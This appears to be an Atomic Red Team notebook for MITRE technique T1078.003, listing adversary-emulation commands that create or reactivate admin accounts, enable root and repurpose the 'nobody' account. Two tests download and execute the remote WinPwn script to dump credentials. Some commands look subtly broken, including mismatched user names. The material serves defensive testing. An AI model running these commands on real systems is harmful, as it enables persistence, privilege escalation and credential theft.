# T1078.003 - Local Accounts
Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. 

## Atomic Tests

### Atomic Test #1 - Create local account with admin privilegesAfter execution the new account will be active and added to the Administrators group**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
net user art-test /add
net user art-test -4RTisCool!-321
net localgroup administrators art-test /add```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 1

#### Cleanup: 
```cmd
net localgroup administrators art-test /delete >nul 2>&1
net user art-test /delete >nul 2>&1```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Create local account with admin privileges - MacOSAfter execution the new account will be active and added to the Administrators group**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 2

#### Cleanup: 
```bash
sudo dscl . -delete /Users/AtomicUser```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOSAfter execution the new account will be active and added to the Administrators group**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 3

#### Cleanup: 
```bash
sysadminctl interactive -deleteUser art-tester```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Enable root account using dsenableroot utility - MacOSAfter execution the current/new user will have root access**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 4

#### Cleanup: 
```bash
dsenableroot -d #current user
dsenableroot -d -u art-tester -p art-tester #new user```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOSAfter execution the current/new user will be added to the Admin group**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
dseditgroup -o edit -a art-user -t user admin```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 5

#### Cleanup: 
```bash
dseditgroup -o edit -d art-user -t user admin```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 5 -Cleanup

### Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittieLoot local Credentials - powerhell kittie technique via function of WinPwn**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 6

### Atomic Test #7 - WinPwn - Loot local Credentials - SafetykatzLoot local Credentials - Safetykatz technique via function of WinPwn**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 7

### Atomic Test #8 - Create local account (Linux)An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 8

#### Cleanup: 
```bash
[ "$(uname)" = 'Linux' ] && userdel art -rf || rmuser -y art
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Reactivate a locked/expired account (Linux)A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. 

In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su art
whoami
exit
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 9

#### Cleanup: 
```bash
userdel -r art 
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Reactivate a locked/expired account (FreeBSD)A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. 

In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 10

#### Cleanup: 
```sh
rmuser -y art 
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 10 -Cleanup

### Atomic Test #11 - Login as nobody (Linux)An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
cat /etc/passwd |grep nobody 
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su nobody
whoami
exit
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 11

#### Cleanup: 
```bash
chsh --shell /usr/sbin/nologin nobody
cat /etc/passwd |grep nobody 
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 11 -Cleanup

### Atomic Test #12 - Login as nobody (freebsd)An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
cat /etc/passwd |grep nobody 
# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 12

#### Cleanup: 
```sh
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
```

In [ ]:
Invoke-AtomicTest T1078.003 -TestNumbers 12 -Cleanup

## Detection
Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.